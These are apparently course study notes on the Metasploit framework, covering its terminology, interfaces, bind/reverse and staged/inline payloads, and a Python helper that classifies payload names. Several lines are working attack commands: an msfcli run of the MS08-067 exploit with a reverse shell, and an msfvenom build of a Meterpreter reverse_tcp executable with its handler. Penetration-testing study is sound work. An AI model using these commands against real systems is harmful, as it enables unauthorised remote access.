Source: "Advanced Penetration Testing" Cybrary
Metasploit

* Exploitation framework
* Written in Ruby
* Modular
* Exploits, payloads, auxiliaries, and more

Terminology

* Exploit: vector for penetrating the system
* Payload: shellcode; what you want the exploit to do after exploitation
* Auxiliary: other modules such as scanning and information gathering
* Session: connection resulting from a successful exploit

Interfaces

* Msfconsole
* Msfcli
* Armitage

Utilities

* Msfpayload
* Msfencode
* Msfupdate
* Msfvenom

Exploitation Streamlining

Traditional exploit:
* Find a public exploit
* Replace offsets, return address, etc. for your target
* Replace the shellcode

Metasploit:
* Load the Metasploit module
* Select the target
* Select the payload

Metasploit Payloads

* Bind shell: opens a port on the victim machine
* Reverse shell: pushes a shell back to the attacker
* Inline: full payload in the exploit
* Staged: shellcode calls back to the attacker to get the rest

Msfcli (command line)

* O = show options
* P = show payloads
* E = run exploit

E.g.:
$ msfcli windows/smb/ms08_067_netapi RHOST=10.0.0.101 PAYLOAD=windows/shell/reverse_tcp LHOST=10.0.0.100 E

Msfvenom

Example:
$ msfvenom -p windows/messagebox text="Hello World" -f exe > test.exe

Multi/Handler

* Generic payload handler
* Catches payloads started outside of the framework, for example payloads generated with msfvenom

msf> use multi/handler
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.190 LPORT=1337 -f exe > meterpreter.exe
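An added example (not from the Cybrary course or the Metasploit project) that classifies payload module names using the bind/reverse and inline/staged distinctions from the notes above. It assumes Metasploit's naming convention: staged payloads write stage and stager as separate path segments (windows/shell/reverse_tcp), while inline payloads join them with an underscore (windows/shell_reverse_tcp); the stager name starts with "bind" or "reverse".

```python
from dataclasses import dataclass

# Assumption: Metasploit native payload naming convention.
#   staged : <platform>[/<arch>]/<stage>/<stager>      e.g. windows/meterpreter/reverse_tcp
#   inline : <platform>[/<arch>]/<stage>_<stager>      e.g. windows/shell_reverse_tcp
#   no-net : <platform>[/<arch>]/<stage>               e.g. windows/messagebox
CONNECTION_WORDS = ("bind", "reverse")


@dataclass
class PayloadInfo:
    platform: str
    stage: str        # what runs after exploitation (shell, meterpreter, messagebox, ...)
    staging: str      # "staged" (stager fetches the rest) or "inline" (whole payload in exploit)
    direction: str    # "bind" (victim listens), "reverse" (attacker listens) or "none"
    transport: str    # tcp, https, ... or "" when the payload opens no connection


def classify_payload(name: str) -> PayloadInfo:
    parts = name.strip("/").split("/")
    if len(parts) < 2:
        raise ValueError(f"not a <platform>/<payload> path: {name!r}")
    platform = parts[0]
    last = parts[-1]

    if len(parts) >= 3 and last.split("_")[0] in CONNECTION_WORDS:
        # Stager is its own path segment -> staged payload; the stage precedes it.
        staging, stage, stager = "staged", parts[-2], last
    else:
        # Everything is in one segment -> inline (single) payload.
        staging = "inline"
        tokens = last.split("_")
        hits = [i for i, tok in enumerate(tokens) if tok in CONNECTION_WORDS]
        if hits:
            stage = "_".join(tokens[:hits[0]])
            stager = "_".join(tokens[hits[0]:])
        else:
            stage, stager = last, ""          # e.g. windows/messagebox: no network at all

    if stager:
        direction, _, transport = stager.partition("_")
    else:
        direction, transport = "none", ""
    return PayloadInfo(platform, stage, staging, direction, transport)


def needs_handler(name: str) -> bool:
    """True when the attacker side must be listening (e.g. multi/handler) to catch the payload."""
    return classify_payload(name).direction == "reverse"
```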
Author: Vitali Kremez
July 2016